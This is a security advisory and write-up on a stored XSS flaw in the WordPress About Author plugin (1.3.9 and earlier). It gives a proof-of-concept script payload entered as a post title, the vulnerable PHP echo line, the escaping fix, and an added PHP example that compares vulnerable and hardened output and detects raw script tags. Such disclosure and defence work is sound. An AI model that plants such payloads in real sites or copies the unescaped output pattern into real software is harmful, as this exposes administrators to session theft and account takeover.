Wordpress About Author <= 1.3.9 Authenticated Stored XSS
The Wordpress About Author plugin, version 1.3.9 and earlier, is affected by an authenticated stored cross-site scripting (XSS) vulnerability: the title of an "About Author" entry is echoed unescaped into a hidden shortcode selector that the plugin renders on every page of the Wordpress Admin panel.
Initial submission of the vulnerability
# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
The Wordpress About Author plugin, version 1.3.9 and earlier, is affected by an authenticated stored cross-site scripting (XSS) vulnerability.
2. Proof of Concept:
Stored Cross-site scripting (XSS)
- Using a Wordpress user account, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new). Note that the `<script>` tag only survives storage for a user with the unfiltered_html capability (an Editor or Administrator on a single-site install); for lower roles Wordpress runs the title through its KSES filter before saving.
- Insert in the post_title input the following payload: `"><script>alert(1)</script>`
- Save. The payload is now stored in post_title and executes on every page/route of the Wordpress Admin panel, because the plugin renders the (hidden) About Author shortcode selector on all admin pages.
Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```
Detailed analysis of the vulnerability
Going to About Author > Add new within the admin panel, we can submit the following payload as the title: "><script>alert(1)</script>
The input side is not where the bug is: XSS is an output-encoding problem. Looking at /wp-content/plugins/about-author
at lines 335-353, we can observe the following unescaped output of user-supplied data. Line 345
echoes the post_title stored in the database straight into the markup, which leads to the stored XSS.
```php
<div id="AMSA" style="display:none;">
<?php $all_posts = wp_count_posts( 'about_author')->publish;
if(!$all_posts==null) {?>
<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
<select id="Ab_Tm_ME">
<?php
global $wpdb;
$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish' AND post_type='about_author' ");
foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
// Vulnerable line: $title_var comes from the database and is concatenated into the HTML without esc_html()/esc_attr()
echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
} ?>
</select>
<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
<?php } else { ?>
<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
}
?>
</div>
```
The successful exploitation of the vulnerability looks as follows in the HTML output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```
Note that this div is emitted, with style="display:none;", on every page of the Wordpress Admin panel, so the vulnerability was reachable from all admin pages rather than only the About Author screens. Keep in mind that "><script>alert(1)</script>
is executed regardless of the style="display:none;": the browser parses and runs a <script> element even when its parent is hidden, so hiding the selector provides no protection.
How to fix
Update to the latest available version of the About Author plugin. The underlying fix is to escape post_title at the point of output (esc_attr() for the value attribute, esc_html() for the option text) instead of concatenating raw database content into the markup; the title is attacker-controlled data even though it comes from the site's own database.
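The following is an added example, not code from the plugin or the advisory author. It places the plugin's original option rendering next to a hardened version, and adds a small check that can be run over a captured admin page response to tell whether the `Ab_Tm_ME` selector still contains a raw `<script>` element (the sample input is constructed from the stored response output shown above). The `esc_attr()`/`esc_html()` shims are simplified stand-ins built on `htmlspecialchars()` so the file runs under plain `php`; inside Wordpress the real functions are defined and the shims are skipped.

```php
<?php
// Added example (not the plugin's code). Simplified stand-ins for the
// WordPress escaping helpers so this runs under plain `php` without WordPress
// loaded. When WordPress is loaded, function_exists() is true and the real
// esc_attr()/esc_html() are used instead.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// The plugin's original rendering (vulnerable): post_title is concatenated
// straight into the markup, so a title containing '<' or '>' rewrites the DOM.
function render_option_vulnerable(int $id, string $title): string {
    return "<option value='" . $id . "'>" . $title . "</option>";
}

// Hardened rendering: escape separately for the attribute context and for the
// text context. ENT_QUOTES also covers the single-quoted value attribute.
function render_option_fixed(int $id, string $title): string {
    return "<option value='" . esc_attr((string) $id) . "'>"
         . esc_html($title) . "</option>";
}

// Check a captured admin page: does the About Author shortcode selector still
// contain a raw <script> element? A patched plugin renders it as &lt;script&gt;.
// Returns false when the selector is not present on the page at all.
function select_has_unescaped_script(string $html): bool {
    if (!preg_match('#<select id="Ab_Tm_ME">(.*?)</select>#s', $html, $m)) {
        return false;
    }
    return stripos($m[1], '<script') !== false;
}

// Constructed sample input: the three titles from the advisory's stored
// response output, including the XSS payload.
$titles = [
    5748 => 'wqddqwqd',
    5749 => 'ads',
    5751 => '"><script>alert(1)</script>',
];

$vulnerable = '<select id="Ab_Tm_ME">';
$fixed      = '<select id="Ab_Tm_ME">';
foreach ($titles as $id => $title) {
    $vulnerable .= render_option_vulnerable($id, $title);
    $fixed      .= render_option_fixed($id, $title);
}
$vulnerable .= '</select>';
$fixed      .= '</select>';

echo "vulnerable: ", $vulnerable, PHP_EOL;
echo "fixed:      ", $fixed, PHP_EOL;
echo "vulnerable page flagged: ",
     var_export(select_has_unescaped_script($vulnerable), true), PHP_EOL;
echo "fixed page flagged:      ",
     var_export(select_has_unescaped_script($fixed), true), PHP_EOL;
```

In the hardened output the payload is rendered as literal text (`&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;`) and the check reports false; against the original rendering it reports true. The check is deliberately a string match on the selector's inner HTML rather than a DOM parse, because what matters for the verdict is whether a `<script` tag reached the browser unencoded, not how a particular parser recovers from the broken markup.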
Public appearances
- tba
Other references
- tba